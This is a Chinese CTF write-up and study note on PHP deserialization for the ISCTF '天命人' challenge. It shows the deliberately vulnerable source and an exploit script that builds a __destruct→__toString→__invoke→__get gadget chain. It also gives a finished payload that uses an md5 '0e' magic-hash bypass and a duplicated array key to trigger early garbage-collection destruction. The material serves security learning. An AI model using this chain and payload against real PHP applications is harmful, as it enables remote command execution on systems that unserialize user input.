复现的时候发现不会 gc 回收机制，写出来当笔记了
学习from:https://xz.aliyun.com/t/11843?time__1311=Cq0xuD0DnD203GNem%3DQaqiI3Y5p2GbD
直接拿isctf的题目来进行练习
天命人
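<?php
// Challenge source from the write-up, kept verbatim except for the stray "\"
// that the pasted copy had in front of `class Wuzhishan` (a parse error, not
// part of the challenge). Every weakness below is deliberate: the task is to
// reach system('cat /flag') through an unserialize() magic-method chain.
//
// Trigger order of the chain as the write-up uses it:
//   Tianmingren::__destruct     -> echo $this->tianming
//   Dinghaishenzhen::__toString -> calls $this->yun as a function
//   Huoyanjinjing::__invoke     -> reads $this->huoyan->jinjing
//   Wuzhishan::__get            -> md5 loose comparison, then system()
error_reporting(0);

class Wuzhishan
{
    public $wu = "俺老孙定要踏破这五指山!<br>";
    public $zhi;
    public $shan;

    // Fires on a read of an undefined property (->jinjing from Huoyanjinjing).
    // Defender note: `==` between md5() digests is a loose comparison, so two
    // "0e<digits>" strings compare as equal floats; a fixed version would use
    // hash_equals() (or at least ===) and never shell out on request input.
    function __get($j)
    {
        echo "此地阴阳二气略显虚浮,加上刚刚带入的阳气,或可借此遁逃!<br>";
        $yin = "s214587387a";
        $yang = $_GET['J'];
        if (md5($yin) == $yang && md5($yin) == md5($yang)) {
            echo "哦?又一个不信天命之人?行了,拿了东西速速离开吧<br>";
            system('cat /flag');
        }
    }
}

class Huoyanjinjing
{
    public $huoyan;
    public $jinjing;

    // Not on the chain used by the write-up; it overwrites $huoyan with a
    // string, so the following property read yields nothing useful.
    function __get($huo)
    {
        $this->huoyan = "火眼能洞察一切邪祟!<br>";
        echo $this->huoyan->jinjing;
    }

    // Fires when the instance is called like a function ($f() below). With
    // $huoyan set to an object, reading ->jinjing invokes that object's __get.
    function __invoke()
    {
        $this->jinjing = "金睛能看破世间迷惘!<br>";
        echo $this->huoyan->jinjing;
    }
}

class Dinghaishenzhen
{
    public $Jindou = "一个筋斗能翻十万八千里!<br>";
    public $yun;

    // Fires when the instance is echoed (from Tianmingren::__destruct).
    // $yun is treated as a callable, which is what lets an object with
    // __invoke continue the chain.
    function __toString()
    {
        $f = $this->yun;
        $f();
        return "你真的逃出去了吗?天命人?<br>";
    }
}

class Jingdouyun
{
    public $Qishier = 72;
    public $bian = "看俺老孙七十二变!<br>";

    // Only fires on serialize(), which this script never calls. Note it
    // references `Jindouyun`, which does not match the declared class name;
    // left verbatim since it is not on the chain.
    function __sleep()
    {
        echo "三更敲门,菩提老祖送我筋斗云...<br>";
        echo new Jindouyun();
    }
}

class Tianmingren
{
    public $tianming;
    public $ren;

    // Head of the chain: runs whenever an instance is freed.
    function __destruct()
    {
        echo "迷途中的羔羊,你相信天命吗?<br>";
        echo $this->tianming;
    }
}

// NOTE(security): unserialize() on request data is the deliberate sink of the
// challenge; production code must not unserialize attacker-controlled input
// (prefer json_decode, or at minimum restrict allowed_classes).
$data = unserialize($_POST['Wukong']);
// Intended as a guard: abort before the normal end-of-script destructor pass.
// The write-up's point is that an object freed *during* unserialize() (the
// duplicated array key) is destructed before this line is reached.
throw new Exception('开局一根棍,装备全靠打。');
?>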
就是gc回收机制加上反序列化
链子很简单
直接上exp了
// Stub copies of the challenge classes. Only the class names and the declared
// property order matter here, because serialize() writes them out verbatim;
// the magic methods and default values from the target are deliberately omitted.
class Wuzhishan
{
    public $wu;
    public $zhi;
    public $shan;
}

class Huoyanjinjing
{
    public $huoyan;
    public $jinjing;
}

class Dinghaishenzhen
{
    public $Jindou;
    public $yun;
}

class Tianmingren
{
    public $tianming;
    public $ren;
}

// Build the object graph in the order the target's magic methods consume it:
// Tianmingren (__destruct) -> Dinghaishenzhen (__toString) ->
// Huoyanjinjing (__invoke) -> Wuzhishan (__get).
$a = new Tianmingren();
$a->tianming = new Dinghaishenzhen();
$a->tianming->yun = new Huoyanjinjing();
$a->tianming->yun->huoyan = new Wuzhishan();
// Wrapped in an array so the object is an array element rather than the root
// value. This prints keys i:0 and i:1; the posted payload in the write-up has
// the second key edited to i:0 as well (see the text above for why).
$b = array($a, 0);
echo serialize($b);
?>
因为这里还存在 md5 的绕过，直接让 J=0e215962017
最后因为还要绕过异常处理，所以我们直接反序列化一个数组，让第二个索引也为 0 即可绕过
payload
GET:?J=0e215962017
POST=Wukong=a:2:{i:0;O:11:"Tianmingren":2:{s:8:"tianming";O:15:"Dinghaishenzhen":2:{s:6:"Jindou";N;s:3:"yun";O:13:"Huoyanjinjing":2:{s:6:"huoyan";O:9:"Wuzhishan":3:{s:2:"wu";N;s:3:"zhi";N;s:4:"shan";N;}s:7:"jinjing";N;}}s:3:"ren";N;}i:0;i:0;}
### CTFSHOW卷王杯[easy unserialize]